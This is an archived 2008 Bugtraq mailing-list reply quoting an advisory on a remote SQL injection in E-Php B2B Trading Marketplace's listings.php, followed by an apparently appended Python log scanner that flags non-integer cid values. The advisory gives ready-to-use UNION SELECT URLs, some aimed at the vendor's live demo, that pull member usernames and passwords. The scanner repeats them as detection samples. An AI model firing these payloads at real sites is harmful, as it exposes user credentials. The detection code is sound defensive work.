Bugtraq mailing list archives

Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability


From: packet () packetstormsecurity org
Date: Wed, 10 Sep 2008 12:38:48 -0400

Already discovered:

http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading
Marketplace Scripts suffers from a remote SQL injection vulnerability in listings.php. Homepage: http://www.darkc0de.com/. Authored By r45c4l (r45c4l[at]hotmail.com)

On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote:
|___________________________________________________|
|
| E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.Hussin-X.CoM <http://www.hussin-x.com/>  |  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.ephpscripts.com
|
|___________________________________________________|

Exploit:



www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members--

L!VE DEMO:

INFO

http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members--



http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members--

____________________________( Greetz )_________________________________
|
|    All members of the Forum  WwW.Hussin-X.CoM <http://www.hussin-x.com/> |
WwW.TrYaG.CC <http://www.tryag.cc/>
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|  Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori
|______________________________________________________________________


                             Im IRAQi
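The flaw in the advisory above is a numeric parameter (cid) placed into the query unquoted, so the check a defender wants, both in a fixed listings.php and when reviewing access logs, is simply "is cid a plain integer" rather than a keyword blacklist. The following is an added example, not E-Php's code; the log lines are constructed and use the payloads quoted above in both their "+" and "%20" encodings:

```python
"""Model of the listings.php?cid= flaw: cid must be a plain integer, so any
other value is an injection attempt.  Added example; log lines constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache common-log lines; two carry the advisory's payloads.
LOG_LINES = [
    '10.0.0.5 - - [10/Sep/2008:12:00:01 -0400] "GET /Script/listings.php?browse=sell&cid=12 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Sep/2008:12:00:07 -0400] "GET /Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- HTTP/1.1" 200 6140',
    '10.0.0.9 - - [10/Sep/2008:12:00:09 -0400] "GET /Script/listings.php?browse=sell&cid=-1%20union%20select%201,concat(user(),version(),database()),3,4,5,6,7,8%20FROM%20ephpb2b_members-- HTTP/1.1" 200 6102',
    '10.0.0.7 - - [10/Sep/2008:12:00:11 -0400] "GET /Script/index.php HTTP/1.1" 200 3000',
]

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
CID_RE = re.compile(r'^-?\d+$')


def cid_is_valid(raw):
    """Allow-list check: a category id is a plain (possibly negative) integer.
    A fixed listings.php should enforce the same rule (e.g. cast to int)
    before the value ever reaches the SQL string."""
    return CID_RE.match(raw) is not None


def find_cid_injections(lines):
    """Return (ip, decoded cid) for listings.php requests whose cid is not an
    integer.  parse_qs decodes both %xx and '+' so the check sees the same
    payload whichever encoding the client used."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        if not parts.path.endswith('/listings.php'):
            continue
        cid = parse_qs(parts.query).get('cid', [None])[0]
        if cid is None or cid_is_valid(cid):
            continue  # no cid, or a legitimate integer id
        hits.append((m.group('ip'), cid))
    return hits


if __name__ == '__main__':
    for ip, cid in find_cid_injections(LOG_LINES):
        print(f'{ip}: cid={cid!r}')
```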


